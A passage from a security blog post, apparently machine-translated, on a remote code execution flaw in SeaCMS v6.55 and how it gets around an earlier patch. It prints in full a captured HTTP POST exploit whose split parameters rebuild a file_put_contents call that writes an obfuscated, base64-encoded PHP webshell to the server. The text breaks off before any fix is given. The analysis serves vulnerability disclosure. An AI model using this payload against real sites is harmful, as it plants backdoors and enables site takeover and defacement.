Hacking Book | Free Online Hacking Learning


jiaotu technology - natural selection laboratory » marine cms (seacms) v6.55 execution of arbitrary code vulnerability and its patch bypass method

Posted by bassolino at 2020-02-27


Recently, one of our security hosting customers responded that their server was attacked, and hackers uploaded webshell and tampered with the content of the web page. After we installed the cloud lock protection software for the customer, we intercepted a 0day vulnerability for ocean CMS (seacms). Ocean CMS is a set of video on demand system designed for different demand webmasters. It has a high market share in film and television CMS. Its official address is: http://www.seacms.net/

Several old loopholes in marine CMS (seacms) and their repairing methods

In February 2017, a foreground getshell vulnerability was exposed in CMS 6.45. Please refer to http://blog.csdn.net/qq_/article/details/76595817 for details. The vulnerability is due to the fact that search.php does not filter user input, which causes the order parameter submitted by the attacker to enter the parseif function to execute eval. The official fix in version 6.46 is to filter the parameters entered by users and limit the length to 20 characters. However, this repair method does not completely fix the vulnerability, because several parameters entered by the user can be combined during the replacement operation, so the patch is bypassed. Later, the official released version 6.54 on August 7 to fix the vulnerability again. This fix added a sentence:

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";

That is to say, the order parameter can only be fixed content, which avoids the attack through the order parameter, but does not solve the problem of other parameters entering the parseif function.

Analysis of 0day vulnerability in marine CMS (seacms)

The attack payload we captured is as follows:

POST /search.php HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1317 Connection: keep-alive Upgrade-Insecure-Requests: 1 searchword={if{searchpage:year}&searchtype=5&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=file_p&9[]=ut_contents('./data/cache/wee.&9[]=php',base&9[]=64_decode('PD9waHAgCiRsZz0iWlRack5HdGZhMlJyaXJaV3RpcmphMjlyWkdpcnRsaXJJaWs3Q2lSelluQWdQaXJTQWtkaXJtSnNLQ2lySmpkSGNpTENJaUxDSmpkSGlyZGppclkzUjNjaXJtVmpkSGRoZEdOMGQyVmpkSGRmWm1OMGQzVnVpclkyTiI7CiR2cT0iSUFva2RXWTlpckluTnVZek1pT3dva2EyRTlpcklrbEZRbXhraXJiVVppYzBzaU93aXJva2NHcDBpclBTSkRVbVpWUlRsVVZraXJZaU93b2tkbUpzSUQwZ2MzUnlYM0psY0d4aFkyVW9pckluaXJScElpd2lJaXdpZEciOwokamogPSBzdHJfcmVwbGFjZSgicGMiLCIiLCJwY3NwY3RycGNfcGNycGNlcGNwbHBjYWNwY2UiKTsKJHJrZj0ibHpkR2xpcjBkR2x5ZEdsZmNpcm5ScFpYUnBjR3gwaXJhV0YwaXJhV05sSWlrN0NpUnBjWGM5SWtZMlkybGtaRWlydFVjejBpT3dva1ltaXJ0bUlpckRpcjBnSkhaaWJDZ2lheUlzSUNJaUxDaXJBaWEySmhhM05yIjsKJHFpPSIwZDNSamRIZHBiMk4wZDJpcjRpS1RzS2lySkcxd2VTQTlJQ1J6WW5Bb0p5Y3NJQ1JpYTJZb0pIWmliQ2dpWWlJc0lDSWlMaXJDQWthMkV1SkhpckJpcnFkQzRrZFdZdUpHbHhkeWtpcnBLVHNnSkcxd2VTZ3BPd289IjsKJG5zeCA9ICRqaigiZGQiLCAiIiwgImJkZGFzZGRlZGQ2ZGQ0ZGRfZGRkZGRlZGRjZGRvZGRkZGRlIik7CiRpZmwgPSAkamooImVmIiwiIiwiZWZjcmVhdGVmZV9lZmZlZnVlZm5lZmNlZnRpZWZvZWZuIik7CiRqZXogPSAkaWZsKCcnLCAkbnN4KCRqaigiaXIiLCAiIiwgJHZxLiRya2YuJGxnLiRxaSkpKTsgJGpleigpOwo/Pg=='));ec&9[]=ho(md5(123));exit;

As you can see, attack

Posted on October 17, 2017 at 4:29 PM by admin · permalinkin: Web Security